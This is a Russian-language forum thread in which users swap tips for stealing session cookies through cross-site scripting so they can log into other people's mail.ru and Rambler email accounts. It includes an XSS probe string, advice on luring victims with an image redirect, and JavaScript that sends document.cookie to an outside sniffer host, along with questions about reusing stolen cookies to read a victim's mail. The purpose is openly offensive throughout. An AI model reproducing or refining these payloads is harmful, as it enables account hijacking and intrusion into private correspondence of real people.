Цитата:

Сообщение от kamikadze1988

Я смог получить куки, но изображение открывается только в IE, в опере и фаерфоксе не открывается, соответственно куки не приходят.
Не подскажите в чём дело?

незнаю попробуй поменять ссылку на картинку.. (картинку вставь другую):turned:

Народ такая проблема есть ,может не по теме но голову скоро разобю об стену, короче скачал прогу TINY XSS scanner ввел адресс _http:mail.ru_
и уже 10 час жду уязвимый XSS. Как проще ручкали искать объяснит кто нибудь ламеру а лучше видео пусть сделает.

Цитата:

Сообщение от noxcho

Народ такая проблема есть ,может не по теме но голову скоро разобю об стену, короче скачал прогу TINY XSS scanner ввел адресс _http:mail.ru_
и уже 10 час жду уязвимый XSS. Как проще ручкали искать объяснит кто нибудь ламеру а лучше видео пусть сделает.

программой не найдеш =) особенно на майл ру)

ручками можеш поимкать с помощью этого скрипта
">alert()
вставляеш его после первого знака = в адресной строке.
И еще в строчки где есть запрос на отправку

народ,объясните ламеру... где стыриные куки смотреть? куда они придут??? пожалуста...

вообщем такая хрень у меня
делаю всё как сдесь.. куки приходят, всё норм
но когда сую куки в оперу, почта не открывается
что делать ?

насчет трюка с написанием скрипта и его сохранением под .img >>>>>в майле и рамблере такое не катит уже. картинка не открывается в браузере а значит и скрипт не запашет
у кого есть способы обойти эту защиту напишите кому не в падлу и не ставьте плиз 70-80 сообщений чтоб увидеть текст

Цитата:

Сообщение от noxcho

насчет трюка с написанием скрипта и его сохранением под .img >>>>>в майле и рамблере такое не катит уже. картинка не открывается в браузере а значит и скрипт не запашет
у кого есть способы обойти эту защиту напишите кому не в падлу и не ставьте плиз 70-80 сообщений чтоб увидеть текст

с пассивкой можно сделать редирект на открытку:wink: чел смотрит фотку ты смотришь его почту:turned:

Цитата:

Сообщение от PioNeeRkin

народ,объясните ламеру... где стыриные куки смотреть? куда они придут??? пожалуста...

куки на сниффере! в разделе "лог"

Добавлено через 10 минут

Цитата:

Сообщение от noxcho

насчет трюка с написанием скрипта и его сохранением под .img >>>>>в майле и рамблере такое не катит уже. картинка не открывается в браузере а значит и скрипт не запашет

Не знаю, у меня на майле все отлично работает =)

Всем привет.
Я тут новенький.
и хотел узнать свои ошибки.
1. вот JavaScript код с редиректом

img = new Image(); img.src = "http://httpz.ru/nh91eusq512.gif?"+document.cookie; // здесь ваш код для кражи кукис
// редирект через 3 сек.
var URL = "http://de.fishki.net/picsw/012010/20/post/devushki/tn.jpg"
var speed = 3000; // редирект через 3 секунды
function reload() {
document.location = URL
}
setTimeout("reload()", speed);

куки вообще не приходят, прихотит ip и info о браузере.

2. делал просто JavaScript код

javascript:document.write('img = new Image(); img.src = "http://httpz.ru/nh91eusq512.gif?"+document.cookie;')

куки приходят но когда я заменяю свои то не попадаю на почту.

кто подскажет как на mail попасть ?

3. я смогу посмореть почту после манипуляции с куки только когда жертва онлайн?
или в любой момент и даже через день или 2 ?